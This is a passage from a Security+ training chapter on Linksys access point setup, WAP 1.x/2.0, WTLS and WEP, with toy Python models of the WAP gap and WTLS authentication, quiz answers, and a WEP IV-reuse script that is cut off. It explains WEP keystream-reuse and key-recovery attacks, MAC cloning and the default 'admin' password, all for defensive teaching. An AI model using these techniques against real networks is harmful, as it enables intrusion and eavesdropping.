      The Access Point is now connected to your 10/100 network.

 3 Connect the AC adapter to the WAP11 power port and to an electrical outlet
      To avoid damage to your unit, use only the power adapter supplied with the
      Access Point.

 4 At the laptop PC, insert the Linksys Setup Wizard CD in the CD-ROM drive
      The Welcome screen appears. If the autorun program does not start, choose
      Start, Run, and enter D:\setup.exe (if D: is your PC’s CD-ROM drive).

 5 Click Setup
      The Connecting the Wireless Access Point screen appears.

 6 Click Next

 7 Click Next
      The initial Setup screen appears.
    Click Yes
      (To change the settings.) The system prompts for a password.

 8 In the Password field, enter the default password, admin
    Click OK
      The default password is printed in the product documentation, so anyone on the
      LAN can reconfigure an access point that still uses it. In a production
      deployment, changing it is the first configuration step; it is left unchanged
      here only because this is a classroom demonstration.

 9 Change the IP Address and the Subnet Mask
      (If necessary, to conform to the classroom setup.) The IP Address must be
      unique on your network.
    Change the AP Name
      You can assign any unique name to the Access Point.
    When finished, click Next
      The Basic Settings screen appears.

10 In the SSID field, type SEC-CLASS
      Change the SSID from the vendor default so that the access point is
      identifiable and does not advertise its make and default configuration. Note
      that the SSID is not a security control: it is sent in cleartext and is visible
      to any wireless sniffer, so changing it does not by itself protect the LAN from
      intrusion.
    Click Next

11 Click Next
      (To continue past the Security (Optional) screen.) The Confirm Your Network
      Settings screen appears. In a production deployment you would not skip this
      screen; an access point with no encryption enabled accepts any client in radio
      range.

12 Review your settings, then click Yes
      Your changes are saved.
    Click Exit
      (To complete the basic setup.) The Access Point is now configured for the
      classroom network.


Topic B: WAP 1.x and WAP 2.0
                     This topic covers the following CompTIA Security+ exam objective:

                      #      Objective

                      2.6    Recognize and understand the administration of the following wireless technologies and
                             concepts
                              • WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol)
                              • WTLS (Wireless Transport Layer Security)




                     The WAP protocol
Explanation          The Wireless Application Protocol (WAP) is an open, global specification that is
                     designed to deliver information and services to users of handheld digital wireless
                     devices, such as mobile phones, pagers, personal digital assistants (PDAs), smart
                     phones, and two-way radios. It’s designed to be compatible with most wireless networks
                     including CDPD, CDMA, DataTAC, DECT, FLEX, GPRS, GSM, iDEN, Mobitex,
                     PDC, PHS, TETRA, TDMA, and ReFLEX. WAP can be built on any operating system
                     including PalmOS, EPOC, Windows CE, FLEXOS, OS/9, and JavaOS.
                     WAP was developed by the WAP Forum to provide open protocol specifications to
                     enable access to the Internet across different transport options and on many devices. The
                     WAP Forum was founded in 1997 by Unwired Planet (now Phone.com), Ericsson,
                     Motorola, and Nokia. The WAP Forum no longer exists as an independent organization.
                     The Open Mobile Alliance (OMA) now includes the WAP work
                     (www.openmobilealliance.org/tech/affiliates/wap/wapindex.html). The
                     WAP Forum is not a standards body, as is the IEEE, but it does work closely with
                     standards bodies such as the IEEE, W3C, ETSI, TIA, and AMIC. The WAP Forum
                     currently has a member list of over 230 companies, made up of handset manufacturers,
                     carriers, software developers, and other companies. Its board of directors comprises
                     industry representatives from Motorola, Sprint PCS, Ericsson, IBM, Intel Corporation,
                     Microsoft, NEC Corporation, Nokia, NTT DoCoMo, Sun Microsystems, Texas
                     Instruments, Vodafone, and others. Like the IEEE, the WAP Forum has formed various
                     working groups to focus on different aspects of wireless data communication and
                     mobile commerce (m-commerce).
                     The WAP Forum was formed in the middle of a meteoric rise in the use of mobile
                     phones and the Internet. As the major mobile phone companies saw their markets start
                     to saturate, particularly in Europe and Asia, they realized that, if they were to continue
                     their rapid growth, they would need to add new features and services to their phones.
                     The idea of bringing the Internet to handheld devices was very appealing, but the
                     constraints were severe. Traditional Internet users view content-rich Web material
                     on large screens, using computers equipped with fast processors, large amounts of
                     memory, and keyboards, over telephone lines or high-bandwidth access lines such as
                     cable and T1 lines. As shown in Exhibit 8-1 and Exhibit 8-2, handheld devices have
                     very small screens, clumsy user interfaces (only number keys in the case of a mobile
                     phone), much slower processors, limited memory, and much lower bandwidth (typically
                     only 9600 bps). For mobile device users to gain access to the Internet, significant
                     changes needed to be made.




Exhibit 8-1: Sanyo Sprint SCP-6000 – WAP-enabled phone




Exhibit 8-2: Handspring Treo 270 – WAP-enabled communicator

                  The WAP 1.x stack
                  Like data transmissions between wired network devices, wireless devices need to be
                  able to communicate with data sources over a network. With the slow processor speeds
                  of handheld devices and the latency caused by limited bandwidth, the WAP Forum
                  needed to modify the OSI Model and create its own set of protocols called the WAP
                  stack.
                  Once you have an understanding of the components of the WAP stack, you can discuss
                  how a WAP-capable client (usually a wireless phone, communicator, or PDA) requests
                  and receives information over the Internet.

                  Comparison to the OSI model
                  WAP 1.x was based as closely as possible on the OSI Model so it could interact with the
                  Internet, but there are some significant differences between the two.
                  The following table compares the WAP 1.x stack to the OSI stack. Notice that the
                  layers do not correspond exactly to one another; the table is simply a conceptual
                  tool to help you understand some of the similarities and differences between the
                  two models.
                  Some of the most notable differences are:
                      • There are five layers in the WAP 1.x stack that would lie within the top four (of
                        seven) layers of the OSI Model.
                      • The transaction and security layers of the WAP 1.x stack are new. (Although
                        one could conceptually place SSL and TLS here, those protocols are actually
                        Session and Application layer protocols in the OSI model.)
                      • No network layer exists, as WDP at the Transport layer performs many of these
                        functions in combination with the Bearer protocols.
                  WAP is much leaner than the OSI Model in that each of its protocols was designed
                  to keep data transactions as compact as possible and to tolerate many more
                  dropped packets than the OSI Model.

                   Layer             WAP 1.x                                OSI/Web

                   Application       Wireless Application Environment       HTML, JavaScript, and others
                                     (WAE)

                   Session           Wireless Session Protocol (WSP)        HTTP

                   Transaction       Wireless Transaction Protocol (WTP)

                   Security          Wireless Transport Layer Security      SSL/TLS
                                     (WTLS)

                   Transport         Wireless Datagram Protocol (WDP)       TCP/IP, TCP/UDP

                   Lower layer(s)    Bearers (GPRS, TDMA, CDMA, and         IP, Data Link layer, Physical layer
                                     so on)

These protocols were based on the International Organization for Standardization OSI
Model, but were different enough from it to require that data communications between
clients (wireless devices) and servers pass through a WAP gateway, which in effect
converts the data from one type of network protocol to another.
    • The Wireless Application Environment (WAE) corresponds to the HTML layer, but
        unlike HTML, which allows for a wide variety of content formats that can
        consume large amounts of processing power and be displayed on large computer
        screens, WAE was designed only to specify lightweight formats, such as text
        and image formats, and to leave decisions related to browser types,
        phonebooks, and the like to device vendors.
    • The Wireless Session Protocol (WSP) provides connection- and connectionless-
      oriented session standards that require a relatively limited amount of information
      exchanges between the wireless device and the server compared to the number
      of information exchanges required between a wired device and the server.
    • Connection-oriented session services that require reliable data transmission
      operate over the Wireless Transaction Protocol (WTP) layer while
      connectionless-oriented session services operate over the Wireless Datagram
      Protocol (WDP). The WTP operates over the WDP or the optional WTLS layer.
      This layer allows for either reliable or unreliable transactions and, like other
      WAP 1.x layers, has been designed to limit the number of transactions necessary
      to allow data transport, relative to the number of transactions necessary in the
      OSI/Web stack.
    • The Wireless Datagram Protocol (WDP) is the bottom layer above the bearer
      layer. WDP differs greatly from UDP in the OSI/Web stack in that it runs over a
      wide variety of mobile bearer networks, whereas UDP must run over an IP
      network.
Another significant difference between wireless and wired data transfer lies in the
network architectural structures of the two network types. Exhibit 8-3 illustrates the
differences between a WAP network and a wired network’s architecture.




Exhibit 8-3: WAP vs. wired network

                  WAP 1.x security
                  To gain access to information on the application server, the WAP client (a WAP-
                  enabled mobile phone, PDA, and so forth) must take the following steps:
                      1 The client first makes a connection with the WAP gateway and then sends a
                         request for the content that it wants using WSP. (WSP is similar to HTTP, but its
                         overhead is much smaller than that of HTTP.)
                      2 The gateway then converts the request into the HTTP format and forwards it to
                         the application server.
                      3 The application server then sends the requested content back to the WAP
                         gateway.
                      4 The gateway converts the data using WSP, compresses it, and sends it on to the
                         WAP client.
                  If the WAP client has enabled the Wireless Transport Layer Security (WTLS) protocol
                  (the WAP security protocol discussed shortly), then the data is encrypted between the
                  WAP client and the WAP gateway.
                  WAP 1.x does not require the use of WTLS. If it is not enabled, then all of the data
                  is transmitted to and received from the WAP gateway in plaintext. (WAP 2.0 employs
                  TLS end to end rather than WTLS, so no conversion at a gateway is necessary.)
                  Between the gateway and the application server the data is encrypted using the
                  Transport Layer Security (TLS) protocol. However, the gateway must decrypt the WTLS
                  traffic, convert it from WSP to HTTP (and vice versa), and re-encrypt it with TLS,
                  so there is a brief interval, milliseconds, during which the data exists in
                  plaintext inside the gateway. This interval is referred to as the WAP gap, and it
                  drew a great deal of criticism when WAP was first deployed. Financial services
                  companies were particularly concerned by this flaw, and many of them chose to
                  operate their own WAP gateways to ensure they had adequate control over who had
                  access to the data while it was in plaintext.
                  The chance of an outsider capturing this data is small, but the risk is real. An
                  attacker would need access to the WAP gateway itself, which is usually located within
                  the carrier’s secure premises (the same premises that protect billing information),
                  and would have to pick the target transaction out of all of the traffic passing
                  through the gateway. Adding to the difficulty is the fact that packets passing
                  through the gateway are not written to disk; the conversion takes place in the
                  gateway’s RAM. The real trust issue is therefore not eavesdropping on the wire but
                  the gateway operator and anyone who compromises the gateway host: either can read
                  every transaction in the clear, which is why a business that handles sensitive data
                  should operate its own gateway rather than rely on the carrier’s.
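The following script models the WAP gap described above next to the WAP 2.0 end-to-end alternative. It is an added example, not code from the course text or from the WAP Forum. The ciphers are toy constructions (an HMAC-SHA256 keystream) standing in for the WTLS and TLS record layers so that the script runs with only the standard library; the key names, helper names and the sample request are assumptions made for illustration.

```python
"""Model of the WAP 1.x "WAP gap" next to WAP 2.0 end-to-end TLS.

Added example; not code from the original course text or from the WAP Forum.
The ciphers are toy constructions (an HMAC-SHA256 keystream) standing in for
the WTLS and TLS record layers so the script runs with only the standard
library. Key names, helper names and the sample request are assumptions.
"""
import hashlib
import hmac
import os


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stream cipher: XOR data with an HMAC-SHA256 keystream derived from
    key and nonce. Symmetric, so one call both encrypts and decrypts. It stands
    in for a record-layer cipher and is not for production use."""
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        block = hmac.new(key, nonce + counter.to_bytes(4, "big"),
                         hashlib.sha256).digest()
        stream.extend(block)
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def wsp_to_http(wsp_request: bytes) -> bytes:
    """Toy protocol conversion: a WSP-style 'GET <url>' becomes an HTTP/1.1
    request, the job a WAP 1.x gateway does between its two legs."""
    method, url = wsp_request.split(b" ", 1)
    return method + b" " + url + b" HTTP/1.1\r\nHost: example.test\r\n\r\n"


class Wap1xGateway:
    """Terminates WTLS toward the client and TLS toward the server. Everything
    it forwards sits in plaintext in its memory for a moment: the WAP gap."""

    def __init__(self, wtls_key: bytes, tls_key: bytes) -> None:
        self.wtls_key = wtls_key      # negotiated with the client (WTLS)
        self.tls_key = tls_key        # negotiated with the server (TLS)
        self.plaintext_seen = []      # what a compromised gateway could log

    def forward(self, nonce: bytes, wtls_record: bytes) -> bytes:
        wsp_request = keystream_xor(self.wtls_key, nonce, wtls_record)  # WTLS decrypt
        http_request = wsp_to_http(wsp_request)                          # WSP -> HTTP
        self.plaintext_seen.append(http_request)                         # the gap
        return keystream_xor(self.tls_key, nonce, http_request)         # TLS encrypt


def wap1x_request(url: bytes):
    """Client -> gateway over WTLS, gateway -> server over TLS.
    Returns (what the gateway saw in clear, what the server decrypted)."""
    wtls_key, tls_key, nonce = os.urandom(32), os.urandom(32), os.urandom(8)
    gateway = Wap1xGateway(wtls_key, tls_key)
    wtls_record = keystream_xor(wtls_key, nonce, b"GET " + url)   # client side
    tls_record = gateway.forward(nonce, wtls_record)
    server_view = keystream_xor(tls_key, nonce, tls_record)       # server side
    return gateway.plaintext_seen, server_view


def wap20_request(url: bytes):
    """WAP 2.0: the client speaks HTTP over TLS end to end, so a gateway or
    proxy in the path only relays opaque bytes.
    Returns (what the gateway saw, what the server decrypted)."""
    tls_key, nonce = os.urandom(32), os.urandom(8)     # client and server only
    http_request = wsp_to_http(b"GET " + url)
    tls_record = keystream_xor(tls_key, nonce, http_request)  # client side
    gateway_view = [tls_record]                                # relay sees ciphertext
    server_view = keystream_xor(tls_key, nonce, tls_record)    # server side
    return gateway_view, server_view


def gateway_learns_url(transport, url: bytes) -> bool:
    """True if the requested URL is readable in whatever the gateway observed."""
    gateway_view, _ = transport(url)
    return any(url in chunk for chunk in gateway_view)


if __name__ == "__main__":
    # Constructed sample request carrying a sensitive parameter.
    SAMPLE_URL = b"/bank/balance?account=12345678"
    print("WAP 1.x gateway sees URL:", gateway_learns_url(wap1x_request, SAMPLE_URL))
    print("WAP 2.0 relay sees URL:  ", gateway_learns_url(wap20_request, SAMPLE_URL))
```

Both paths deliver the same HTTP request to the server; the difference is what the box in the middle can read. In the WAP 1.x path the gateway holds both keys and therefore the plaintext, which is the reason the text gives for running your own gateway; in the WAP 2.0 path it holds neither.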

Do it!   B-1:   Discussing WAP 1.x
          Questions and answers
          1 The WAP 1.x stack Security layer is similar to which of the following?
            A    SSL/TLS
            B    HTML
            C    TCP
            D    IP

          2 The WAP 1.x lower layer is similar to what layers of the OSI Model? (Choose all
            that apply.)
            A    IP
            B    Data link
            C    Physical
            D    Security

          3 WAP is a proprietary encryption protocol that was created by WECA. True or
            false?

            False: It was created by the WAP Forum.

          4 Where does the WAP gap occur?
            A    In the WAP client
            B    In the WAP gateway
            C    Between the WAP client and the application server
            D    Between the WAP gateway and the application server
            E    None of the above

                         The Wireless transport layer security protocol
Explanation              In addition to security threats posed by the WAP gap, there have also been a number of
                         proven attacks publicized about the Wireless Transport Layer Security (WTLS) protocol
                         that WAP 1.x employs. Before these flaws are discussed, however, you should
                         understand what WTLS is and how it works.
                         WTLS was designed to provide authentication, data encryption, and privacy for WAP
                         1.x users. As mentioned, mobile devices have much less memory, computational
                         resources, and battery power than traditional computers. They also experience much
                         greater latency (the time it takes for the data to arrive and be processed) because they
                         send and receive data at a much, much slower rate than computers. If you were using
                         9600 bps modems back in the early to mid-1990s, perhaps you remember how long
                         you had to wait for a Web page to download. That is about where data transmission
                         rates are now for mobile devices. For these reasons, the WAP Forum chose to develop a
                         scaled-down version of TLS that does not require as much processing power, memory,
                         or battery life.

                         Authentication
                         WTLS allows for three different classes of authentication:
                             • Class 1 authentication is anonymous and does not allow either the client or the
                               gateway to authenticate the other. It protects only against passive
                               eavesdropping; an active attacker who impersonates the gateway goes undetected.
                             • Class 2 authentication only allows the client to authenticate the gateway.
                             • Class 3 authentication allows both the client and the gateway to authenticate
                               each other.
                         Class 3 authentication requires the use of a Wireless Identity Module (WIM). A WIM is
                         a tamper-resistant device, such as a smart card, that facilitates the storage of digital
                         signatures and can also perform more advanced cryptography with its enhanced
                         processing power.
                         The WTLS protocol completes Class 2 authentication in four steps, as shown here:
                            1 Prior to sending a request to open a session with the WAP gateway, the WAP
                              device sends a request for authentication. It’s always the client that begins this
                              process, never the WAP gateway. The client can also challenge the gateway
                              again at any time during the session.
                              Both TLS and WTLS differentiate between a connection and a session. A
                              session can exist over many connections. This is especially helpful in wireless
                              communications because connections are not as stable as they are in the wired
                              world. If a connection is broken, the session can continue using the same
                              security mechanisms that were initially established, but it’s up to the gateway (or
                              server in the case of TLS) to decide whether or not to create a new session with
                              new security parameters.
                            2 The gateway responds and then sends a copy of its certificate, which contains
                              the gateway’s public key, to the WAP device.
                            3 The WAP device validates the certificate, generates a unique random value,
                              encrypts that value with the gateway’s public key, and sends the encrypted
                              value to the gateway.
                            4 The WAP gateway receives the encrypted value and uses its own private key to
                              decrypt it. Only the holder of the matching private key can recover the value,
                              which is what lets the client authenticate the gateway. Nothing in the
                              exchange tells the gateway who the client is.
                                                 Wireless and instant messaging    8–17

This process completes quickly and with less overhead than a TLS handshake, largely
because WTLS permits weaker (shorter) keys than TLS; they take less processing time to
use, but they are also easier to break. Remember that in WAP 1.x, WTLS is optional, so it
might not even be turned on, and it only encrypts data between the client and the WAP
gateway. The WAP gap is still present: the gateway decrypts the WTLS data and holds it in
plaintext from that moment until it re-encrypts it with TLS and sends it on to the
application server.
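The four-step Class 2 exchange described above, modelled end to end as an added example (this is not WAP Forum code or code from this course). Toy RSA with small primes and no padding stands in for the gateway’s certificate key so the script runs offline; it must never be used for real traffic. The gateway name, the pinned trust store and the message dictionaries are assumptions for illustration.

```python
"""WTLS Class 2 authentication, modelled step by step.

Added example, not WAP Forum or course code. Toy RSA (small primes, no
padding) stands in for the gateway certificate key so this runs offline;
never use it for real traffic. Names, the trust store and the message
dictionaries are assumptions for illustration.
"""
import hashlib
import random
import secrets


def _is_probable_prime(n: int, rounds: int = 16) -> bool:
    """Miller-Rabin primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits: int) -> int:
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def rsa_keygen(bits: int = 256):
    """Toy RSA: returns ((e, n), (d, n)). Far too small for real use."""
    e = 65537
    while True:
        p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:  # e is prime, so this means gcd(e, phi) == 1
            return (e, p * q), (pow(e, -1, phi), p * q)


def fingerprint(cert: dict) -> str:
    """What the client pins: a hash of the certificate subject and public modulus."""
    e, n = cert["pub"]
    return hashlib.sha256(cert["subject"].encode() + n.to_bytes(64, "big")).hexdigest()


class Gateway:
    """WAP gateway side. It holds the private key; it never identifies the client."""

    def __init__(self, name: str):
        self.pub, self.priv = rsa_keygen()
        self.cert = {"subject": name, "pub": self.pub}
        self.premaster = None

    def on_client_hello(self, hello: dict) -> dict:
        # Step 2: answer the authentication request with the certificate (public key).
        return {"type": "ServerHello+Certificate", "cert": self.cert}

    def on_key_exchange(self, msg: dict) -> dict:
        # Step 4: recover the client's random value with the private key.
        d, n = self.priv
        self.premaster = pow(msg["enc"], d, n).to_bytes(20, "big")
        return {"type": "ServerFinished"}


class Client:
    """WAP device side. Only it can start authentication (step 1)."""

    def __init__(self, trusted_fingerprints: set):
        self.trusted = trusted_fingerprints
        self.premaster = None

    def client_hello(self) -> dict:
        # Step 1: the client, never the gateway, initiates.
        return {"type": "ClientHello", "nonce": secrets.token_bytes(16)}

    def on_certificate(self, msg: dict) -> dict:
        cert = msg["cert"]
        if fingerprint(cert) not in self.trusted:
            raise ValueError("gateway certificate not trusted")
        # Step 3: fresh random value, encrypted to the gateway's public key.
        e, n = cert["pub"]
        self.premaster = secrets.token_bytes(20)  # 160 bits, below the toy modulus
        enc = pow(int.from_bytes(self.premaster, "big"), e, n)
        return {"type": "ClientKeyExchange", "enc": enc}


def run_class2(client: Client, gateway: Gateway) -> bool:
    """Runs the four steps; True when both ends derived the same secret."""
    m1 = client.client_hello()
    m2 = gateway.on_client_hello(m1)
    m3 = client.on_certificate(m2)  # raises if the gateway is not the pinned one
    gateway.on_key_exchange(m3)
    return client.premaster == gateway.premaster


if __name__ == "__main__":
    gw = Gateway("wap-gateway.example")  # assumed name
    print("genuine gateway authenticated:", run_class2(Client({fingerprint(gw.cert)}), gw))
    rogue = Gateway("wap-gateway.example")  # same name, different key pair
    try:
        run_class2(Client({fingerprint(gw.cert)}), rogue)
    except ValueError as err:
        print("rogue gateway rejected:", err)
```

Two things are visible in the run. First, the gateway checks nothing about the sender of step 3, so any party can complete the exchange; that is why Class 2 is one-way and why Class 3 needs a WIM on the device to hold a client credential. Second, the gateway ends up holding the pre-master secret, so everything it later decrypts for forwarding exists in plaintext on the gateway, which is the WAP gap described above.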

SSIDs
Another area of concern is the unsafe use of service set identifiers (SSIDs). SSIDs are
wireless network names, which are sent in the clear with wireless frames so that devices
can identify which network they belong to. The default SSID values should never be
used, nor should SSIDs that help unscrupulous hackers with sniffers identify your
WLAN or the organization behind it. These would include such SSIDs as “12th Street
Branch Accounting Department” or “ABC Consulting Firm.” Giving your wireless devices
more cryptic SSIDs helps reduce what an attacker learns about your organization, but
because the SSID is transmitted in plaintext it is not a secret and not a security control
on its own; it must be combined with encryption and authentication.

Weak encryption keys
The weak keys permitted by WTLS have been widely criticized. Some WAP supporters have
responded to these criticisms by arguing that the shortcuts taken in WTLS were
necessary in order for WAP to adapt to the wireless environment. These weaknesses are
real and should be considered when transmitting sensitive information using a
WAP-enabled device.
Although many vendors have already made improvements to WAP 1.x-enabled devices
with higher levels of encryption and more efficient processing, it cannot be emphasized
enough that WTLS cannot be taken for granted, even if the vendor has made these
improvements or simply states that its application incorporates WTLS. Verify what is
actually in use (whether WTLS is enabled at all, which authentication class, and which
cipher and key length are negotiated) rather than relying on the claim.
8–18   CompTIA Security+ Certification

                  The WAP 2.0 stack
                  In January 2002, the WAP Forum released the “Wireless Application Protocol (WAP
                  2.0) Technical White Paper.” This paper specified a new suite of utilities and security
                  enhancements. One of these security enhancements was the release of a new WAP stack
                  that eliminates the use of WTLS and instead relies on a profile of TLS, the same
                  protocol used on the common Internet stack. Because one TLS session can run from the
                  device all the way to the application server, this allows end-to-end security and
                  avoids any WAP gap.
                  In response to the emergence of higher-speed wireless networks, all of the other layers
                  of WAP 1.x are also replaced by standard Internet layers, which will make wireless data
                  transactions much more efficient. WAP 2.0 still supports the WAP 1.x stack in order to
                  facilitate legacy devices and systems. A comparison of the WAP 1.x and WAP 2.0
                  stacks is provided in Exhibit 8-4.




                  Exhibit 8-4: A comparison of WAP 1.x and 2.0 stacks

                  In addition to these changes, WAP 2.0 has added a number of features. These include,
                  but are not limited to:
                      • WAP Push — Allows content providers to send information, such as stock
                        prices and advertisements, directly to the WAP device without being requested
                        to do so.
                      • User agent profile — Allows a way to capture and communicate WAP device
                        capabilities and user preferences.
                      • Wireless Telephony Application — Provides a range of advanced telephony
                        applications including such call-handling services as making, answering,
                        placing, or redirecting calls.
                      • External Functionality Interface (EFI) — Allows the use of plug-and-play
                        modules to extend the features of the client’s applications. It also allows the
                        addition of smart cards, GPS devices, health care devices, and digital cameras.
                      • Multimedia Messaging Service (MMS) — Provides a framework to enable a
                        richer messaging solution.

Do it!   B-2:   Discussing WTLS protocol and WAP2.0
          Questions and answers
          1 WTLS’s Class 2 authentication only allows the client to authenticate the gateway.
            True or false?

            True

          2 WTLS’s Class 3 authentication requires the use of a tamper-resistant device called
            a ________________________________________.

            Wireless Identity Module (WIM)

          3 Put the steps below in the correct sequence to describe a Class 2 authentication.

            ___ The client generates a unique random value and encrypts it with the             3
            public key.

            ___ The gateway sends a copy of its certificate containing its public key.          2

            ___ The client sends a request for authentication to the gateway.                   1

            ___ The gateway decrypts the encrypted value with its private key.                  4

          4 What are SSIDs?

            SSIDs are wireless network names, which are sent with wireless data packets to help devices
            identify each other in a wireless network.

          5 WAP 2.0 uses which of the following as its security protocol?
            A      TCP
            B      SSL
            C      TLS
            D      WTLS
            E      STP

            C

Do it!   B-3: Controlling access to the WAP (demonstration only)

          Instructor note: Introduce this activity as a demonstration. Students should observe
          only. Steps 1-13 are done on the Instructor’s computer.

          1 From the Instructor’s computer, open Internet Explorer
            The Access Point is designed to be functional right out of the box. To implement
            greater security on your wireless network, you will use Linksys’s Web-based
            configuration utility.

          2 In the Address field, enter http:// followed by the IP Address of your Linksys WAP
            (For example, http://192.168.1.251.) The system prompts you for a user name and
            password.

          3 Leave the user name blank. In the Password field, enter admin. Click OK
            The configuration utility appears with the Setup tab active. This tab allows you to
            change the Access Point’s general settings. (admin is the factory default password;
            you change it in step 6.)

          4 Review the settings but leave the AP Name, LAN IP Address, and AP Mode settings at
            their default values
            The AP Name and LAN IP Address were set during the initial setup.
            The AP Mode is set to Access Point by default. This connects your wireless PCs to a
            wired network.
            To communicate with another Wireless Access Point, you have two options: (1) If
            within the same network, choose Access Point Client. This will make this WAP a
            client to the other WAP. (2) If you want to connect two networks together, select
            Wireless Bridge. This will make the connection to another access point set as a
            wireless bridge. In both cases, you would specify the other WAP’s MAC address.
            To connect three or more networks together, choose Wireless Bridge-Point to
            MultiPoint.

          5 Activate the Password tab

          6 Enter a new password, then re-enter the new password to confirm
            To avoid using the default password. Be sure to choose a complex password.

          7 Click Apply
            To save the change.

          8 Enter the new password and click OK
            To return to the utility.

          9 Activate the Advanced tab
            The Filter tab appears.
            One method of restricting wireless devices is to create a list of approved devices. A
            list of preapproved media access control (MAC) addresses can be entered into the
            Filtered MAC Address table in the access point. Only those stations on the ACL will
            be admitted. The Linksys WAP11 provides an option to create and manage an ACL.
            Note that the MAC address is sent in the clear in every 802.11 frame, so anyone with
            a sniffer can read an approved address and clone it onto another adapter. MAC
            filtering raises the bar only slightly; use it alongside encryption and
            authentication, never instead of them.

         10 Select Enabled
            Filtering is enabled.

         11 Select Only deny PCs with MAC listed below to access device
            This will set the MAC Address list to deny the listed PCs.
            The software allows up to 50 MAC Addresses to be specified. If you need to enter
            more than 10, click on the pull-down menu above the MAC Address fields.

         12 In the MAC 01 field, enter the MAC Address of the wireless adapter in the computer
            with the wireless adapter (laptop or desktop)
            Do not use dashes as you enter the address. The MAC Address can be obtained by
            running ipconfig /all on the PC’s command screen.

         13 Click Apply
            To save the changes. Notice that you’ll see a Continue button; it’s not necessary to
            click Continue; the program will return to the previous page automatically.

          Instructor note: Steps 14 and 15 are done on the computer with the wireless network
          adapter.

         14 From the computer with the listed MAC Address, load Internet Explorer

         15 Enter the IP Address of the WAP in the Address field
            The page fails to load, because that adapter’s MAC address is on the deny list.

          Instructor note: Step 16 is done on the Instructor’s computer.

         16 On the Filters tab on the Instructor’s PC, select Only allow PCs with MAC listed
            below to access device. In the MAC 01 field, enter the MAC Address of the wireless
            adapter in the computer with the wireless adapter. Click Apply

          Instructor note: Step 17 is done on the computer with the wireless network adapter.

         17 From the computer with the listed MAC Address, retry to access the WAP using its
            IP Address
            The page successfully loads.


Topic C: Wired equivalent privacy
                            This topic covers the following CompTIA Security+ exam objective:

                             #     Objective

                             2.6   Recognize and understand the administration of the following wireless technologies and
                                   concepts
                                    • WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol)
                                    • Vulnerabilities
                                        Site Surveys




                            Introducing WEP
Explanation                 Wired Equivalent Privacy (WEP) is the optional security mechanism that was specified
                            by the 802.11 protocol to provide authentication and confidentiality in a wireless LAN
                            (WLAN) environment. Even though the IEEE committee recommended that WEP
                            should be used, it also stated that WEP should not be considered adequate security and
                            strongly recommended that it should not be considered without also implementing a
                            separate authentication process and providing for external key management. Before
                            delving into WEP, however, you must first gain an understanding of what a WLAN is
                            and how it operates.
                            A WLAN works to connect clients to network resources using radio signals to pass data
                            through the atmosphere, as depicted in Exhibit 8-5.



Instructor note: Review with students the operation of a typical wireless LAN as
depicted here. Notice that critical resources, such as servers and internetwork devices,
are still connected using wired technologies, so WLANs are frequently really hybrids
that incorporate both wired and wireless components.




                            Exhibit 8-5: Conceptual diagram of wireless LAN


                  In order to do this, it employs wireless access points (AP), as shown in Exhibit 8-6,
                  which are connected to the wired LAN and act as radio broadcast stations that transmit
                  data to clients equipped with wireless network interface cards (NICs), as shown in
                  Exhibit 8-7.




                  Exhibit 8-6: Netgear ME 102 802.11b Access Point




                  Exhibit 8-7: 3 Com AirConnect wireless NIC

                  This allows users to stay connected to the network as they move around from place to
                  place within and between the broadcast zones of the various access points (APs) within
                  the WLAN. WLANs use WEP to encrypt and guarantee the integrity of the data passed
                  between the client and the AP and to authenticate clients that are requesting network
                  resources.

                  How WEP works
                  WEP uses a symmetric key (a shared key) to authenticate wireless devices (not wireless
                  device users) and to protect the data by encrypting the transmissions with the RC4
                  stream cipher; an integrity check value is appended to each frame before encryption.
                  Each of the APs and clients needs to share the same key in order for this to happen
                  effectively.
                  When a client wants to send data to or request resources from the network, it sends a
                  request to the AP asking for permission to access the wired network. If WEP has not
                  been enabled, and by default it is not, then the AP allows the request for resources to
                  pass through to the wired LAN. If WEP has been enabled, then the client begins a
                  challenge-and-response authentication process: the AP sends a challenge, and the
                  client returns it encrypted under the shared key to prove that it holds the key.

                  WEP’s weaknesses
                  WEP has been criticized for having many problems, including problems related to the
                  initialization vector (IV) that it uses when encrypting data, and also problems with
                  how it handles keys.

Initialization vector concerns
An IV is a 24-bit value that is concatenated with the shared secret key to form the RC4
key for each frame, and is then transmitted in plaintext in front of the encrypted data
so that the receiver can rebuild the same RC4 key. There are several problems with the IV:
   • WEP sends the IV in plaintext across the WLAN and, therefore, it can be picked
     up by a hacker along the way.
   • The WEP IV is only 24 bits long, which means that it can only take 2^24
     (16,777,216) values, so on a busy network IVs start repeating within hours.
   • The IV is reused on a regular basis. Because the shared key does not change, a
     reused IV means a reused RC4 keystream: an attacker who captures two frames
     with the same IV can XOR them to cancel the keystream and, with one known
     plaintext, decrypt the other frame outright. Researchers have actually broken
     the 128-bit WEP encryption in as little as two hours using this method.
In August 2001, Fluhrer, Mantin, and Shamir published a paper titled “Weaknesses in
the Key Scheduling Algorithm of RC4.” In it, they described an attack that recovers
the secret key from frames encrypted under certain weak IV-and-key combinations. They
also criticized the fact that the RC4 stream cipher, though effective in many other
instances, is rendered useless in WEP because WEP builds each per-frame key by
concatenating a fixed secret key with an IV that the attacker already knows.
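The IV reuse problem from the list above, worked through in code as an added example (not code from this course). It implements RC4 and WEP’s framing as the text describes it (24-bit IV sent in the clear, RC4 keyed with IV || shared key, CRC-32 integrity value encrypted with the data), then shows that two frames sharing an IV leak each other’s plaintext and how quickly a 24-bit IV space produces a collision. The key, IVs and frames are constructed test data, not captured traffic.

```python
"""WEP IV reuse, worked through on constructed frames.

Added example, not course code. Implements RC4 and WEP's framing as described
above (24-bit IV sent in the clear, RC4 keyed with IV || shared key, CRC-32
integrity value encrypted with the data). Keys, IVs and packets are made up
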